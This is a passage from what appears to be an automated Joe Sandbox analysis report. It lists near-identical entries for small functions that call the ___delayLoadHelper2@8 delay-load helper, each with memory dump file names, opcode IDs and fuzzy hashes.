                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 589375d06cbb7a347c27342aaccef10bb7fb10d246252bba9760525587e4364b
                                                            • Instruction ID: b22cbf030d206bef73b111c7ec8cb4746cfae81d9370010cecb84b1f93f6a878
                                                            • Opcode Fuzzy Hash: 589375d06cbb7a347c27342aaccef10bb7fb10d246252bba9760525587e4364b
                                                            • Instruction Fuzzy Hash: AFB012A625C903EC32445244EC02D3F022CD7C0F13330883FF815C4081DD4C4C095136
                                                            Function 0005F1D0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e13a19551d98d3d692bd6367e716f6634d56df5976f4acc7586363a55bfdad77
                                                            • Instruction ID: 19423b80c4c9c49bc07bb27a19d8d96370755fe5e5e22b742d63708bfa2512ff
                                                            • Opcode Fuzzy Hash: e13a19551d98d3d692bd6367e716f6634d56df5976f4acc7586363a55bfdad77
                                                            • Instruction Fuzzy Hash: 43B092A2258802AC22445244AC0293F0228C7C1B12320C83AB815C4182E948480A5036
                                                            Function 0005F1DA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a75432f6143e340a5816eaa73c6fb694b23e1b6660b2e661dd9e1953f2a9b5a1
                                                            • Instruction ID: 4d405d28cea9167c91976b00b041a4ba99e7bab49dca20abf29170a9d0a59a11
                                                            • Opcode Fuzzy Hash: a75432f6143e340a5816eaa73c6fb694b23e1b6660b2e661dd9e1953f2a9b5a1
                                                            • Instruction Fuzzy Hash: 95B092A2258942BC22845244AC0293B0228C7C0B12330893AB815C4181E94848495036
                                                            Function 0005F1E4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 713235def1325dfa5924886270a53d1babe77aed7006b951da574ecd17d25437
                                                            • Instruction ID: e3fa8e8958de7db32ea07ba62b4d37c13577f5f718c1d551253314ec3a16f32b
                                                            • Opcode Fuzzy Hash: 713235def1325dfa5924886270a53d1babe77aed7006b951da574ecd17d25437
                                                            • Instruction Fuzzy Hash: BDB092A2298802AC22445244AD0293B0228C7C0B12320883AB815C8181E998480E5036
                                                            Function 0005F1F8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 895a95114463104981f5434faff8486664f35d43b74fe53e39eecc4c347dbb6e
                                                            • Instruction ID: f92494a968a13a65e3447f63f215e5efde3ba1dff60932ffe45171c10a5bff7b
                                                            • Opcode Fuzzy Hash: 895a95114463104981f5434faff8486664f35d43b74fe53e39eecc4c347dbb6e
                                                            • Instruction Fuzzy Hash: 9FB092A2258802AC22445244AC0293F0228C781B12320883AB815C4082D948480A5036
                                                            Function 0005F202 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6e27a56706c5a816a4e312a90b87239e01ff979a9f32fa287ca2f35ff0a52386
                                                            • Instruction ID: 44e3d1feaacb55345e785aa1470c1e7bac4d7763baa66abbc9463bd0ec30a6f9
                                                            • Opcode Fuzzy Hash: 6e27a56706c5a816a4e312a90b87239e01ff979a9f32fa287ca2f35ff0a52386
                                                            • Instruction Fuzzy Hash: 9EB092A2258902BC22845244AC0293B0228C780B12320893AB825C4081D94848495036
                                                            Function 0005F20C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9ba772ef687d66a31076e5dc5df98526a972a0e49d894b80e46b228c29b50b2b
                                                            • Instruction ID: 2ee8943851e619be45aa3913638fc6c3ea70df1b00d919a167b8bb85a4b22af1
                                                            • Opcode Fuzzy Hash: 9ba772ef687d66a31076e5dc5df98526a972a0e49d894b80e46b228c29b50b2b
                                                            • Instruction Fuzzy Hash: BEB092A2258802AC22445244AD0293B0228C780B12320883AB816C8081D988490A5036
                                                            Function 0005F216 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 750ec01e31f702ddb915d64ed33f55af7327a77c4969f451465eb73a918bd42a
                                                            • Instruction ID: 99099e6870d91b712d1450ae6615a929fee6be382984e84eaa50ff2e9e3bef7c
                                                            • Opcode Fuzzy Hash: 750ec01e31f702ddb915d64ed33f55af7327a77c4969f451465eb73a918bd42a
                                                            • Instruction Fuzzy Hash: FDB092A2258802AC32445245AC0293B0228D780B12320883AB815C8081D94848095036
                                                            Function 0005F220 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: f2959e0da74ec9a1c58509b47e23f451ea237ceb39c47b2f672e844106a36823
                                                            • Instruction ID: 7cffb12ac13dfc79031ca3916d800fb6ae3ba18b8da335a18e6c0def2b967565
                                                            • Opcode Fuzzy Hash: f2959e0da74ec9a1c58509b47e23f451ea237ceb39c47b2f672e844106a36823
                                                            • Instruction Fuzzy Hash: D5B092A2259802AC22845244AC0293F0228CB81B22320883AB815C8082D948480A6036
                                                            Function 0005F22A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: baf6f1b2402a112dbe7e6391a05110b30e1c4756830c37051144109182da86b3
                                                            • Instruction ID: 876202ddf4c42d2dc33bb543f7fa0d31ef3e5e8a0b9e0fb020016508c5936f08
                                                            • Opcode Fuzzy Hash: baf6f1b2402a112dbe7e6391a05110b30e1c4756830c37051144109182da86b3
                                                            • Instruction Fuzzy Hash: 3DB092A625A902BC22845244AC0293B0228C780B22320893AB815C8081D94848495036
                                                            Function 0005F23E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d720baf716fc06477b390aed8251c909006c4c0022b39e7bee35480413ade2a9
                                                            • Instruction ID: 975b2ff1342f4b9b1d828203f09b653ed75eeb0f5acf2e32750bde483bf970bd
                                                            • Opcode Fuzzy Hash: d720baf716fc06477b390aed8251c909006c4c0022b39e7bee35480413ade2a9
                                                            • Instruction Fuzzy Hash: CFB012A226D803EC72845244EC02D3F026CDBC0F23330883FF815C8081DD4C4C095036
                                                            Function 0005F248 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 37b6c165862774e4066c416320a96c5163cda582ba556ed5ba90167dcf861623
                                                            • Instruction ID: bca219b7ccea65a067032b8221d7721dd6bea8a380863041a7fac619836cbca2
                                                            • Opcode Fuzzy Hash: 37b6c165862774e4066c416320a96c5163cda582ba556ed5ba90167dcf861623
                                                            • Instruction Fuzzy Hash: C6B092A2258802AC22445254AC0297F0268C781B12320883AB915C4082DA48480A5036
                                                            Function 0005F25C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: cdac0b95bbbb35e916c515114976ae33a15989b26ab5f78fa325039a4e4559cf
                                                            • Instruction ID: 4969225d393177967a3e734e796561f15cd934b17b11175d403cc8b21af93687
                                                            • Opcode Fuzzy Hash: cdac0b95bbbb35e916c515114976ae33a15989b26ab5f78fa325039a4e4559cf
                                                            • Instruction Fuzzy Hash: F7B092B2258802AC22445244AD0297F02A8C780B12720883AB815C8081D988480A5036
                                                            Function 0005F28E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: bdbcf5c53beec428cb1df192df7ca9ea8fbd113fb47b48854f101caa9820e16a
                                                            • Instruction ID: ab8c579822ddc3669993079e7d005b2c0296b058c226f1f18ab16aa32c4cd978
                                                            • Opcode Fuzzy Hash: bdbcf5c53beec428cb1df192df7ca9ea8fbd113fb47b48854f101caa9820e16a
                                                            • Instruction Fuzzy Hash: 4EB092A26A8802AD32545244AC0293B0228E780B12320893EB915C4081D94848095036
                                                            Function 0005F3F3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: cf9caa61bf3b9c91f354f58482cbde2e09c36bfca070cc0415c970999bf85eb0
                                                            • Instruction ID: 4bb6bf9dd4a3bd525bcbd2889629653fe0865db383657a8addd8e87f4db99b09
                                                            • Opcode Fuzzy Hash: cf9caa61bf3b9c91f354f58482cbde2e09c36bfca070cc0415c970999bf85eb0
                                                            • Instruction Fuzzy Hash: 17B012D12DC4026C32445184AD02C7F011CCBC4F33330C83BFA14C9081EE4C8C4E0032
                                                            Function 0005F3FD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
